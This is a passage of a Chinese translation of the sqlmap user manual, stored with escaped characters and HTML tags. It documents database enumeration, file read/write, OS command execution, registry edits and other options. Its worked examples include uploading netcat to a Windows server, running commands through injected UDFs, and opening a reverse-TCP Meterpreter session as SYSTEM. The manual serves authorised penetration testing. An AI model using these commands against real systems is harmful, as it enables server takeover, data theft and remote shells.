\u5217\u4e3e\u4e00\u4e2aMySQL 4.1\u7684\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.129\/mysql\/get_int_4.php?id=1\" --common-tables -D testdb --banner\n[...]\n[hh:mm:39] [INFO] testing MySQL\n[hh:mm:39] [INFO] confirming MySQL\n[hh:mm:40] [INFO] the back-end DBMS is MySQL\n[hh:mm:40] [INFO] fetching banner\nweb server operating system: Windows\nweb application technology: PHP 5.3.1, Apache 2.2.14\nback-end DBMS operating system: Windows\nback-end DBMS: MySQL &lt; 5.0.0\nbanner: '4.1.21-community-nt'\n[hh:mm:40] [INFO] checking table existence using items from '\/software\/sqlmap\/txt\/common-tables.txt'\n[hh:mm:40] [INFO] adding words used on web page to the check list\nplease enter number of threads? [Enter for 1 (current)] 8\n[hh:mm:43] [INFO] retrieved: users\nDatabase: testdb\n[1 table]\n+-------+\n| users |\n+-------+<\/code><\/pre>\n
\u66b4\u529b\u7834\u89e3\u5217\u540d<\/h2>\n
\u53c2\u6570\uff1a–common-columns<\/p>\n
\u4e0e\u66b4\u529b\u7834\u89e3\u8868\u540d\u4e00\u6837\uff0c\u66b4\u529b\u8dd1\u7684\u5217\u540d\u5728txt\/common-columns.txt\u4e2d\u3002<\/p>\n
\u7528\u6237\u81ea\u5b9a\u4e49\u51fd\u6570\u6ce8\u5165<\/h1>\n
\u53c2\u6570\uff1a–udf-inject,–shared-lib<\/p>\n
\u4f60\u53ef\u4ee5\u901a\u8fc7\u7f16\u8bd1MySQL\u6ce8\u5165\u4f60\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff08UDFs\uff09\u6216PostgreSQL\u5728windows\u4e2d\u5171\u4eab\u5e93\uff0cDLL\uff0c\u6216\u8005Linux\/Unix\u4e2d\u5171\u4eab\u5bf9\u8c61\uff0csqlmap\u5c06\u4f1a<\/p>\n
\u95ee\u4f60\u4e00\u4e9b\u95ee\u9898\uff0c\u4e0a\u4f20\u5230\u670d\u52a1\u5668\u6570\u636e\u5e93\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u7136\u540e\u6839\u636e\u4f60\u7684\u9009\u62e9\u6267\u884c\u4ed6\u4eec\uff0c\u5f53\u4f60\u6ce8\u5165\u5b8c\u6210\u540e\uff0csqlmap\u5c06\u4f1a\u79fb\u9664\u5b83\u4eec\u3002<\/p>\n
\u7cfb\u7edf\u6587\u4ef6\u64cd\u4f5c<\/h1>\n
\u4ece\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d\u8bfb\u53d6\u6587\u4ef6<\/h2>\n
\u53c2\u6570\uff1a–file-read<\/p>\n
\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u8bfb\u53d6\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587<\/p>\n
\u4ef6\u3002<\/p>\n
\u5217\u4e3e\u4e00\u4e2aMicrosoft SQL Server 2005\u7684\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.129\/sqlmap\/mssql\/iis\/get_str2.asp?name=luther\" \n--file-read \"C:\/example.exe\" -v 1\n[...]\n[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server\nweb server operating system: Windows 2000\nweb application technology: ASP.NET, Microsoft IIS 6.0, ASP\nback-end DBMS: Microsoft SQL Server 2005\n[hh:mm:50] [INFO] fetching file: 'C:\/example.exe'\n[hh:mm:50] [INFO] the SQL query provided returns 3 entries\nC:\/example.exe file saved to: '\/software\/sqlmap\/output\/192.168.136.129\/files\/C__example.exe'\n[...]\n$ ls -l output\/192.168.136.129\/files\/C__example.exe\n-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output\/192.168.136.129\/files\/C__example.exe\n$ file output\/192.168.136.129\/files\/C__example.exe\noutput\/192.168.136.129\/files\/C__example.exe: PE32 executable for MS Windows (GUI) Intel\n80386 32-bit<\/code><\/pre>\n
\u628a\u6587\u4ef6\u4e0a\u4f20\u5230\u6570\u636e\u5e93\u670d\u52a1\u5668\u4e2d<\/h2>\n
\u53c2\u6570\uff1a–file-write,–file-dest<\/p>\n
\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002\u4e0a\u4f20\u7684\u6587\u4ef6\u53ef\u4ee5\u662f\u6587\u672c\u4e5f\u53ef\u4ee5\u662f\u4e8c\u8fdb\u5236\u6587<\/p>\n
\u4ef6\u3002<\/p>\n
\u5217\u4e3e\u4e00\u4e2aMySQL\u7684\u4f8b\u5b50\uff1a<\/p>\n
$ file \/software\/nc.exe.packed\n\/software\/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit\n$ ls -l \/software\/nc.exe.packed\n-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm \/software\/nc.exe.packed\n$ python sqlmap.py -u \"http:\/\/192.168.136.129\/sqlmap\/mysql\/get_int.aspx?id=1\" --file-write \n\"\/software\/nc.exe.packed\" --file-dest \"C:\/WINDOWS\/Temp\/nc.exe\" -v 1\n[...]\n[hh:mm:29] [INFO] the back-end DBMS is MySQL\nweb server operating system: Windows 2003 or 2008\nweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727\nback-end DBMS: MySQL &gt;= 5.0.0\n[...]\ndo you want confirmation that the file 'C:\/WINDOWS\/Temp\/nc.exe' has been successfully\nwritten on the back-end DBMS file system? [Y\/n] y\n[hh:mm:52] [INFO] retrieved: 31744\n[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes,\nsame size as the local file '\/software\/nc.exe.packed'<\/code><\/pre>\n
\u8fd0\u884c\u4efb\u610f\u64cd\u4f5c\u7cfb\u7edf\u547d\u4ee4<\/h2>\n
\u53c2\u6570\uff1a–os-cmd,–os-shell<\/p>\n
\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\u3002<\/p>\n
\u5728MySQL\u3001PostgreSQL\uff0csqlmap\u4e0a\u4f20\u4e00\u4e2a\u4e8c\u8fdb\u5236\u5e93\uff0c\u5305\u542b\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\uff0csys_exec()\u548csys_eval()\u3002<\/p>\n
\u90a3\u4e48\u4ed6\u521b\u5efa\u7684\u8fd9\u4e24\u4e2a\u51fd\u6570\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u3002\u5728Microsoft SQL Server\uff0csqlmap\u5c06\u4f1a\u4f7f\u7528xp_cmdshell\u5b58\u50a8\u8fc7\u7a0b\uff0c\u5982\u679c\u88ab\u7981\uff08\u5728Microsoft<\/p>\n
SQL Server 2005\u53ca\u4ee5\u4e0a\u7248\u672c\u9ed8\u8ba4\u7981\u5236\uff09\uff0csqlmap\u4f1a\u91cd\u65b0\u542f\u7528\u5b83\uff0c\u5982\u679c\u4e0d\u5b58\u5728\uff0c\u4f1a\u81ea\u52a8\u521b\u5efa\u3002<\/p>\n
\u5217\u4e3e\u4e00\u4e2aPostgreSQL\u7684\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/pgsql\/get_int.php?id=1\" \n--os-cmd id -v 1\n[...]\nweb application technology: PHP 5.2.6, Apache 2.2.9\nback-end DBMS: PostgreSQL\n[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system\n[hh:mm:12] [INFO] the back-end DBMS operating system is Linux\n[hh:mm:12] [INFO] testing if current user is DBA\n[hh:mm:12] [INFO] detecting back-end DBMS version from its banner\n[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist\n[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist\n[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file\n[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file\ndo you want to retrieve the command standard output? [Y\/n\/a] y\ncommand standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)'\n[hh:mm:19] [INFO] cleaning up the database management system\ndo you want to remove UDF 'sys_eval'? [Y\/n] y\ndo you want to remove UDF 'sys_exec'? [Y\/n] y\n[hh:mm:23] [INFO] database management system cleanup finished\n[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can\nonly be deleted manually<\/code><\/pre>\n
\u7528–os-shell\u53c2\u6570\u4e5f\u53ef\u4ee5\u6a21\u62df\u4e00\u4e2a\u771f\u5b9e\u7684shell\uff0c\u53ef\u4ee5\u8f93\u5165\u4f60\u60f3\u6267\u884c\u7684\u547d\u4ee4<\/p>\n
\u5f53\u4e0d\u80fd\u6267\u884c\u591a\u8bed\u53e5\u7684\u65f6\u5019\uff08\u6bd4\u5982php\u6216\u8005asp\u7684\u540e\u7aef\u6570\u636e\u5e93\u4e3aMySQL\u65f6\uff09\uff0c\u4ecd\u7136\u53ef\u80fd\u4f7f\u7528INTO OUTFILE\u5199\u8fdb\u53ef\u5199\u76ee\u5f55\uff0c\u6765\u521b\u5efa\u4e00\u4e2aweb\u540e\u95e8\u3002\u652f\u6301\u7684\u8bed\u8a00\uff1a<\/p>\n
\n
1\u3001ASP<\/p>\n
2\u3001ASP.NET<\/p>\n
3\u3001JSP<\/p>\n
4\u3001PHP<\/p>\n<\/blockquote>\n
Meterpreter\u914d\u5408\u4f7f\u7528<\/h2>\n
\u53c2\u6570\uff1a–os-pwn,–os-smbrelay,–os-bof,–priv-esc,–msf-path,–tmp-path<\/p>\n
\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524d\u7528\u6237\u6709\u6743\u9650\u4f7f\u7528\u7279\u5b9a\u7684\u51fd\u6570\uff0c\u53ef\u4ee5\u5728\u6570\u636e\u5e93\u4e0e\u653b\u51fb\u8005\u76f4\u63a5\u5efa\u7acbTCP\u8fde\u63a5\uff0c\u8fd9\u4e2a\u8fde\u63a5\u53ef\u4ee5\u662f\u4e00\u4e2a\u4ea4\u4e92\u5f0f\u547d\u4ee4\u884c\u7684Meterpreter\u4f1a\u8bdd\uff0csqlmap\u6839\u636eMetasploit\u751f\u6210shellcode\uff0c\u5e76\u6709\u56db\u79cd\u65b9\u5f0f\u6267\u884c\u5b83\uff1a<\/p>\n
\n
1\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684sys_bineval()\u51fd\u6570\u5728\u5185\u5b58\u4e2d\u6267\u884cMetasplit\u7684shellcode\uff0c\u652f\u6301MySQL\u548cPostgreSQL\u6570\u636e\u5e93\uff0c\u53c2\u6570\uff1a–os-pwn\u3002<\/p>\n
2\u3001\u901a\u8fc7\u7528\u6237\u81ea\u5b9a\u4e49\u7684\u51fd\u6570\u4e0a\u4f20\u4e00\u4e2a\u72ec\u7acb\u7684payload\u6267\u884c\uff0cMySQL\u548cPostgreSQL\u7684sys_exec()\u51fd\u6570\uff0cMicrosoft SQL Server\u7684<\/p>\n
xp_cmdshell()\u51fd\u6570\uff0c\u53c2\u6570\uff1a–os-pwn\u3002<\/p>\n
3\u3001\u901a\u8fc7SMB\u653b\u51fb(MS08-068)\u6765\u6267\u884cMetasploit\u7684shellcode\uff0c\u5f53sqlmap\u83b7\u53d6\u5230\u7684\u6743\u9650\u8db3\u591f\u9ad8\u7684\u65f6\u5019\uff08Linux\/Unix\u7684uid=0\uff0cWindows\u662f<\/p>\n
Administrator\uff09\uff0c–os-smbrelay\u3002<\/p>\n
4\u3001\u901a\u8fc7\u6ea2\u51faMicrosoft SQL Server 2000\u548c2005\u7684sp_replwritetovarbin\u5b58\u50a8\u8fc7\u7a0b(MS09-004)\uff0c\u5728\u5185\u5b58\u4e2d\u6267\u884cMetasploit\u7684payload\uff0c<\/p>\n
\u53c2\u6570\uff1a–os-bof<\/p>\n<\/blockquote>\n
\u5217\u4e3e\u4e00\u4e2aMySQL\u4f8b\u5b50<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.129\/sqlmap\/mysql\/iis\/get_int_55.aspx?id=1\" --os-pwn --msf-path\n\/software\/metasploit\n[...]\n[hh:mm:31] [INFO] the back-end DBMS is MySQL\nweb server operating system: Windows 2003\nweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0\nback-end DBMS: MySQL 5.0\n[hh:mm:31] [INFO] fingerprinting the back-end DBMS operating system\n    [hh:mm:31] [INFO] the back-end DBMS operating system is Windows\nhow do you want to establish the tunnel?\n[1] TCP: Metasploit Framework (default)\n[2] ICMP: icmpsh - ICMP tunneling\n&gt;\n[hh:mm:32] [INFO] testing if current user is DBA\n[hh:mm:32] [INFO] fetching current user\nwhat is the back-end database management system architecture?\n[1] 32-bit (default)\n[2] 64-bit\n&gt;\n[hh:mm:33] [INFO] checking if UDF 'sys_bineval' already exist\n    [hh:mm:33] [INFO] checking if UDF 'sys_exec' already exist\n[hh:mm:33] [INFO] detecting back-end DBMS version from its banner\n[hh:mm:33] [INFO] retrieving MySQL base directory absolute path\n[hh:mm:34] [INFO] creating UDF 'sys_bineval' from the binary UDF file\n[hh:mm:34] [INFO] creating UDF 'sys_exec' from the binary UDF file\nhow do you want to execute the Metasploit shellcode on the back-end database underlying\noperating system?\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)\n[2] Stand-alone payload stager (file system way)\n&gt;\n[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode\nwhich connection type do you want to use?\n[1] Reverse TCP: Connect back from the database host to this machine (default)\n[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports\nbetween the specified and 65535\n[3] Bind TCP: Listen on the database host for a connection\n&gt;\nwhich is the local address? [192.168.136.1]\nwhich local port number do you want to use? [60641]\nwhich payload do you want to use?\n[1] Meterpreter (default)\n[2] Shell\n[3] VNC\n&gt;\n[hh:mm:40] [INFO] creation in progress ... done\n[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..\n_\n| | o\n_ _ _ _ _|_ __, , _ | | __ _|_\n\/ |\/ |\/ | |\/ | \/ | \/ _|\/ _|\/ \/ _| |\n| | |_\/|__\/|_\/_\/|_\/ \/ |__\/ |__\/__\/ |_\/|_\/\n\/|\n|\n=[ metasploit v3.7.0-dev [core:3.7 api:1.0]\n+ -- --=[ 674 exploits - 351 auxiliary\n+ -- --=[ 217 payloads - 27 encoders - 8 nops\n=[ svn r12272 updated 4 days ago (2011.04.07)\nPAYLOAD =&gt; windows\/meterpreter\/reverse_tcp\nEXITFUNC =&gt; thread\nLPORT =&gt; 60641\nLHOST =&gt; 192.168.136.1\n[*] Started reverse handler on 192.168.136.1:60641\n[*] Starting the payload handler...\n[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',\nplease wait..\n[*] Sending stage (749056 bytes) to 192.168.136.129\n[*] Meterpreter session 1 opened (192.168.136.1:60641 -&gt; 192.168.136.129:1689) at Mon Apr 11\nhh:mm:52 +0100 2011\nmeterpreter &gt; Loading extension espia...success.\nmeterpreter &gt; Loading extension incognito...success.\nmeterpreter &gt; [-] The 'priv' extension has already been loaded.\nmeterpreter &gt; Loading extension sniffer...success.\nmeterpreter &gt; System Language : en_US\nOS : Windows .NET Server (Build 3790, Service Pack 2).\nComputer : W2K3R2\nArchitecture : x86\nMeterpreter : x86\/win32\nmeterpreter &gt; Server username: NT AUTHORITYSYSTEM\nmeterpreter &gt; ipconfig\nMS TCP Loopback interface\nHardware MAC: 00:00:00:00:00:00\nIP Address : 127.0.0.1\nNetmask : 255.0.0.0\nIntel(R) PRO\/1000 MT Network Connection\nHardware MAC: 00:0c:29:fc:79:39\nIP Address : 192.168.136.129\nNetmask : 255.255.255.0\nmeterpreter &gt; exit\n[*] Meterpreter session 1 closed. Reason: User exit<\/code><\/pre>\n
\u9ed8\u8ba4\u60c5\u51b5\u4e0bMySQL\u5728Windows\u4e0a\u4ee5SYSTEM\u6743\u9650\u8fd0\u884c\uff0cPostgreSQL\u5728Windows\u4e0eLinux\u4e2d\u662f\u4f4e\u6743\u9650\u8fd0\u884c\uff0cMicrosoft SQL Server 2000\u9ed8\u8ba4<\/p>\n
\u662f\u4ee5SYSTEM\u6743\u9650\u8fd0\u884c\uff0cMicrosoft SQL Server 2005\u4e0e2008\u5927\u90e8\u5206\u662f\u4ee5NETWORK SERVICE\u6709\u65f6\u662fLOCAL SERVICE\u3002<\/p>\n
\u300asqlmap\u7528\u6237\u624b\u518c\u300b\u5176\u5b9e\u53ea\u5199\u4e86\u5927\u90e8\u5206\u53ef\u80fd\u7528\u5230\u7684\u53c2\u6570<\/p>\n
\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c<\/h1>\n
\u5f53\u6570\u636e\u5e93\u4e3aMySQL\uff0cPostgreSQL\u6216Microsoft SQL Server\uff0c\u5e76\u4e14\u5f53\u524dweb\u5e94\u7528\u652f\u6301\u5806\u67e5\u8be2\u3002 \u5f53\u7136\uff0c\u5f53\u524d\u8fde\u63a5\u6570\u636e\u5e93\u7684\u7528\u6237\u4e5f\u9700\u8981\u6709\u6743\u9650\u64cd\u4f5c\u6ce8\u518c\u8868<\/p>\n
\u8bfb\u53d6\u6ce8\u518c\u8868\u503c<\/h2>\n
\u53c2\u6570\uff1a–reg-read<\/p>\n
\u5199\u5165\u6ce8\u518c\u8868\u503c<\/h2>\n
\u53c2\u6570\uff1a–reg-add<\/p>\n
\u5220\u9664\u6ce8\u518c\u8868\u503c<\/h2>\n
\u53c2\u6570\uff1a–reg-del<\/p>\n
\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879<\/h2>\n
\u53c2\u6570\uff1a–reg-key\uff0c–reg-value\uff0c–reg-data\uff0c–reg-type<\/p>\n
\u9700\u8981\u914d\u5408\u4e4b\u524d\u4e09\u4e2a\u53c2\u6570\u4f7f\u7528\uff0c\u4f8b\u5b50\uff1a$ python sqlmap.py -u http:\/\/192.168.136.129\/sqlmap\/pgsql\/get_int.aspx?id=1<\/a> –reg-add –reg-<\/p>\n
key="HKEY_LOCAL_MACHINESOFTWAREsqlmap" –reg-value=Test –reg-type=REG_SZ –reg-data=1<\/p>\n
\u5e38\u89c4\u53c2\u6570<\/h1>\n
\u4ecesqlite\u4e2d\u8bfb\u53d6session<\/h2>\n
\u53c2\u6570\uff1a-s<\/p>\n
sqlmap\u5bf9\u6bcf\u4e00\u4e2a\u76ee\u6807\u90fd\u4f1a\u5728output\u8def\u5f84\u4e0b\u81ea\u52a8\u751f\u6210\u4e00\u4e2aSQLite\u6587\u4ef6\uff0c\u5982\u679c\u7528\u6237\u60f3\u6307\u5b9a\u8bfb\u53d6\u7684\u6587\u4ef6\u8def\u5f84\uff0c\u5c31\u53ef\u4ee5\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/p>\n
\u4fdd\u5b58HTTP(S)\u65e5\u5fd7<\/h2>\n
\u53c2\u6570\uff1a-t<\/p>\n
\u8fd9\u4e2a\u53c2\u6570\u9700\u8981\u8ddf\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\uff0csqlmap\u4f1a\u628aHTTP(S)\u8bf7\u6c42\u4e0e\u54cd\u5e94\u7684\u65e5\u5fd7\u4fdd\u5b58\u5230\u90a3\u91cc\u3002<\/p>\n
\u975e\u4ea4\u4e92\u6a21\u5f0f<\/h2>\n
\u53c2\u6570\uff1a–batch<\/p>\n
\u7528\u6b64\u53c2\u6570\uff0c\u4e0d\u9700\u8981\u7528\u6237\u8f93\u5165\uff0c\u5c06\u4f1a\u4f7f\u7528sqlmap\u63d0\u793a\u7684\u9ed8\u8ba4\u503c\u4e00\u76f4\u8fd0\u884c\u4e0b\u53bb\u3002<\/p>\n
\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801<\/h2>\n
\u53c2\u6570\uff1a–charset<\/p>\n
\u4e0d\u4f7f\u7528sqlmap\u81ea\u52a8\u8bc6\u522b\u7684\uff08\u5982HTTP\u5934\u4e2d\u7684Content-Type\uff09\u5b57\u7b26\u7f16\u7801\uff0c\u5f3a\u5236\u6307\u5b9a\u5b57\u7b26\u7f16\u7801\u5982\uff1a–charset=GBK<\/p>\n
\u722c\u884c\u7f51\u7ad9URL<\/h2>\n
\u53c2\u6570\uff1a–crawl<\/p>\n
sqlmap\u53ef\u4ee5\u6536\u96c6\u6f5c\u5728\u7684\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u7684\u8fde\u63a5\uff0c\u540e\u9762\u8ddf\u7684\u53c2\u6570\u662f\u722c\u884c\u7684\u6df1\u5ea6\u3002<\/p>\n
\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.21.128\/sqlmap\/mysql\/\" --batch --crawl=3\n[...]\n[xx:xx:53] [INFO] starting crawler\n[xx:xx:53] [INFO] searching for links with depth 1\n[xx:xx:53] [WARNING] running in a single-thread mode. This could take a while\n[xx:xx:53] [INFO] searching for links with depth 2\n[xx:xx:54] [INFO] heuristics detected web page charset 'ascii'\n[xx:xx:00] [INFO] 42\/56 links visited (75%)\n[...]<\/code><\/pre>\n
\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26<\/h2>\n
\u53c2\u6570\uff1a–csv-del<\/p>\n
\u5f53dump\u4fdd\u5b58\u4e3aCSV\u683c\u5f0f\u65f6\uff08–dump-format=CSV\uff09\uff0c\u9700\u8981\u4e00\u4e2a\u5206\u9694\u7b26\u9ed8\u8ba4\u662f\u9017\u53f7\uff0c\u7528\u6237\u4e5f\u53ef\u4ee5\u6539\u4e3a\u522b\u7684 \u5982\uff1a<\/p>\n
–csv-del=";"<\/p>\n
DBMS\u8eab\u4efd\u9a8c\u8bc1<\/h2>\n
\u53c2\u6570\uff1a–dbms-cred<\/p>\n
\u67d0\u4e9b\u65f6\u5019\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u4e0d\u591f\uff0c\u505a\u67d0\u4e9b\u64cd\u4f5c\u4f1a\u5931\u8d25\uff0c\u5982\u679c\u77e5\u9053\u9ad8\u6743\u9650\u7528\u6237\u7684\u5bc6\u7801\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\uff0c\u6709\u7684\u6570\u636e\u5e93\u6709\u4e13\u95e8\u7684\u8fd0\u884c\u673a\u5236\uff0c\u53ef\u4ee5\u5207<\/p>\n
\u6362\u7528\u6237\u5982Microsoft SQL Server\u7684OPENROWSET\u51fd\u6570<\/p>\n
\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f<\/h2>\n
\u53c2\u6570\uff1a–dump-format<\/p>\n
\u8f93\u51fa\u7684\u683c\u5f0f\u53ef\u5b9a\u4e49\u4e3a\uff1aCSV\uff0cHTML\uff0cSQLITE<\/p>\n
\u9884\u4f30\u5b8c\u6210\u65f6\u95f4<\/h2>\n
\u53c2\u6570\uff1a–eta<\/p>\n
\u53ef\u4ee5\u8ba1\u7b97\u6ce8\u5165\u6570\u636e\u7684\u5269\u4f59\u65f6\u95f4\u3002<\/p>\n
\u4f8b\u5982Oracle\u7684\u5e03\u5c14\u578b\u76f2\u6ce8\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.136.131\/sqlmap\/oracle\/get_int_bool.php?id=1\" -b --eta\n[...]\n[hh:mm:01] [INFO] the back-end DBMS is Oracle\n[hh:mm:01] [INFO] fetching banner\n[hh:mm:01] [INFO] retrieving the length of query output\n[hh:mm:01] [INFO] retrieved: 64\n17% [========> ] 11\/64 ETA 00:19<\/code><\/pre>\n
\u7136\u540e<\/p>\n
100% [===================================================] 64\/64\n[hh:mm:53] [INFO] retrieved: Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod\nweb application technology: PHP 5.2.6, Apache 2.2.9\nback-end DBMS: Oracle\nbanner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'<\/code><\/pre>\n
sqlmap\u5148\u8f93\u51fa\u957f\u5ea6\uff0c\u9884\u8ba1\u5b8c\u6210\u65f6\u95f4\uff0c\u663e\u793a\u767e\u5206\u6bd4\uff0c\u8f93\u51fa\u5b57\u7b26<\/p>\n
\u5237\u65b0session\u6587\u4ef6<\/h2>\n
\u53c2\u6570\uff1a–flush-session<\/p>\n
\u5982\u679c\u4e0d\u60f3\u7528\u4e4b\u524d\u7f13\u5b58\u8fd9\u4e2a\u76ee\u6807\u7684session\u6587\u4ef6\uff0c\u53ef\u4ee5\u4f7f\u7528\u8fd9\u4e2a\u53c2\u6570\u3002 \u4f1a\u6e05\u7a7a\u4e4b\u524d\u7684session\uff0c\u91cd\u65b0\u6d4b\u8bd5\u8be5\u76ee\u6807\u3002<\/p>\n
\u81ea\u52a8\u83b7\u53d6form\u8868\u5355\u6d4b\u8bd5<\/h2>\n
\u53c2\u6570\uff1a–forms<\/p>\n
\u5982\u679c\u4f60\u60f3\u5bf9\u4e00\u4e2a\u9875\u9762\u7684form\u8868\u5355\u4e2d\u7684\u53c2\u6570\u6d4b\u8bd5\uff0c\u53ef\u4ee5\u4f7f\u7528-r\u53c2\u6570\u8bfb\u53d6\u8bf7\u6c42\u6587\u4ef6\uff0c\u6216\u8005\u901a\u8fc7–data\u53c2\u6570\u6d4b\u8bd5\u3002 \u4f46\u662f\u5f53\u4f7f\u7528–forms\u53c2\u6570\u65f6\uff0c<\/p>\n
sqlmap\u4f1a\u81ea\u52a8\u4ece-u\u4e2d\u7684url\u83b7\u53d6\u9875\u9762\u4e2d\u7684\u8868\u5355\u8fdb\u884c\u6d4b\u8bd5\u3002<\/p>\n
\u5ffd\u7565\u5728\u4f1a\u8bdd\u6587\u4ef6\u4e2d\u5b58\u50a8\u7684\u67e5\u8be2\u7ed3\u679c<\/h2>\n
\u53c2\u6570\uff1a–fresh-queries<\/p>\n
\u5ffd\u7565session\u6587\u4ef6\u4fdd\u5b58\u7684\u67e5\u8be2\uff0c\u91cd\u65b0\u67e5\u8be2\u3002<\/p>\n
\u4f7f\u7528DBMS\u7684hex\u51fd\u6570<\/h2>\n
\u53c2\u6570\uff1a–hex<\/p>\n
\u6709\u65f6\u5019\u5b57\u7b26\u7f16\u7801\u7684\u95ee\u9898\uff0c\u53ef\u80fd\u5bfc\u81f4\u6570\u636e\u4e22\u5931\uff0c\u53ef\u4ee5\u4f7f\u7528hex\u51fd\u6570\u6765\u907f\u514d\uff1a<\/p>\n
\u9488\u5bf9PostgreSQL\u4f8b\u5b50\uff1a<\/p>\n
$ python sqlmap.py -u \"http:\/\/192.168.48.130\/sqlmap\/pgsql\/get_int.php?id=1\" --banner --hex -v 3 --parse-errors\n[...]\n[xx:xx:14] [INFO] fetching banner\n[xx:xx:14] [PAYLOAD] 1 AND 5849=CAST((CHR(58)||CHR(118)||CHR(116)||CHR(106)||CHR(58))||\n(ENCODE(CONVERT_TO((COALESCE(CAST(VERSION() AS CHARACTER(10000)),(CHR(32)))),\n(CHR(85)||CHR(84)||CHR(70)||CHR(56))),(CHR(72)||CHR(69)||CHR(88))))::text||\n(CHR(58)||CHR(110)||CHR(120)||CHR(98)||CHR(58)) AS NUMERIC)\n[xx:xx:15] [INFO] parsed error message: 'pg_query() [<a href='function.pg-query'>function.pg-query<\/a>]: Query\nfailed: ERROR: invalid input syntax for type numeric:\n\":vtj:506f737467726553514c20382e332e39206f6e20693438362d70632d6c696e75782d676e752c20636f6d70696c65642062792047\n4343206763632d342e332e7265616c202844656269616e2032e332e322d312e312920342e332e32:nxb:\" in\n<b>\/var\/www\/sqlmap\/libs\/pgsql.inc.php<\/b> on line <b>35<\/b>'\n[xx:xx:15] [INFO] retrieved: PostgreSQL 8.3.9 on i486-pc-linux-gnu, compiled by\nGCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2\n[...]<\/code><\/pre>\n
\u81ea\u5b9a\u4e49\u8f93\u51fa\u7684\u8def\u5f84<\/h2>\n
\u53c2\u6570\uff1a–output-dir<\/p>\n
sqlmap\u9ed8\u8ba4\u628asession\u6587\u4ef6\u8ddf\u7ed3\u679c\u6587\u4ef6\u4fdd\u5b58\u5728output\u6587\u4ef6\u5939\u4e0b\uff0c\u7528\u6b64\u53c2\u6570\u53ef\u81ea\u5b9a\u4e49\u8f93\u51fa\u8def\u5f84 \u4f8b\u5982\uff1a–output-dir=\/tmp<\/p>\n
\u4ece\u54cd\u5e94\u4e2d\u83b7\u53d6DBMS\u7684\u9519\u8bef\u4fe1\u606f<\/h2>\n
\u53c2\u6570\uff1a–parse-errors<\/p>\n
\u6709\u65f6\u76ee\u6807\u6ca1\u6709\u5173\u95edDBMS\u7684\u62a5\u9519\uff0c\u5f53\u6570\u636e\u5e93\u8bed\u53e5\u9519\u8bef\u65f6\uff0c\u4f1a\u8f93\u51fa\u9519\u8bef\u8bed\u53e5\uff0c\u7528\u8bcd\u53c2\u6570\u53ef\u4ee5\u4f1a\u663e\u51fa\u9519\u8bef\u4fe1\u606f\u3002<\/p>\n
